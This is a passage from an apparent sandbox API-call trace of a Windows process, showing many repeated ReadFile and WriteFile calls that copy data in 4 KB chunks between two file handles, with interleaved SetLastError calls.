nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.151] SetLastError (dwErrCode=0x0) [0097.151] SetLastError (dwErrCode=0x0) [0097.151] SetLastError (dwErrCode=0x0) [0097.151] SetLastError (dwErrCode=0x0) [0097.151] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.151] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.152] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.152] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.152] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.153] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.153] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.153] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.153] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] SetLastError (dwErrCode=0x0) [0097.153] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.153] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.154] SetLastError (dwErrCode=0x0) [0097.154] SetLastError (dwErrCode=0x0) [0097.154] SetLastError (dwErrCode=0x0) [0097.154] SetLastError (dwErrCode=0x0) [0097.154] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.154] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.154] SetLastError (dwErrCode=0x0) [0097.154] SetLastError (dwErrCode=0x0) [0097.154] SetLastError (dwErrCode=0x0) [0097.154] SetLastError (dwErrCode=0x0) [0097.154] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.154] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.154] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.155] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.155] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] SetLastError (dwErrCode=0x0) [0097.155] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.155] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.156] SetLastError (dwErrCode=0x0) [0097.156] SetLastError (dwErrCode=0x0) [0097.156] SetLastError (dwErrCode=0x0) [0097.156] SetLastError (dwErrCode=0x0) [0097.156] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.156] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.157] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.157] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] SetLastError (dwErrCode=0x0) [0097.157] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.158] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.158] SetLastError (dwErrCode=0x0) [0097.158] SetLastError (dwErrCode=0x0) [0097.158] SetLastError (dwErrCode=0x0) [0097.158] SetLastError (dwErrCode=0x0) [0097.158] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.158] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.158] SetLastError (dwErrCode=0x0) [0097.158] SetLastError (dwErrCode=0x0) [0097.158] SetLastError (dwErrCode=0x0) [0097.158] SetLastError (dwErrCode=0x0) [0097.158] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.158] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.159] SetLastError (dwErrCode=0x0) [0097.159] SetLastError (dwErrCode=0x0) [0097.159] SetLastError (dwErrCode=0x0) [0097.159] SetLastError (dwErrCode=0x0) [0097.159] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.159] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.160] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.160] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.160] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.161] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.161] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.161] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.161] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] SetLastError (dwErrCode=0x0) [0097.161] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.161] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.162] SetLastError (dwErrCode=0x0) [0097.162] SetLastError (dwErrCode=0x0) [0097.162] SetLastError (dwErrCode=0x0) [0097.162] SetLastError (dwErrCode=0x0) [0097.162] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.162] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.162] SetLastError (dwErrCode=0x0) [0097.162] SetLastError (dwErrCode=0x0) [0097.162] SetLastError (dwErrCode=0x0) [0097.162] SetLastError (dwErrCode=0x0) [0097.162] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.162] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.162] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.163] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.163] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] SetLastError (dwErrCode=0x0) [0097.163] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.164] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.164] SetLastError (dwErrCode=0x0) [0097.164] SetLastError (dwErrCode=0x0) [0097.164] SetLastError (dwErrCode=0x0) [0097.164] SetLastError (dwErrCode=0x0) [0097.164] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.164] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.164] SetLastError (dwErrCode=0x0) [0097.164] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.164] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.164] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.166] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.167] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.168] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.169] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, 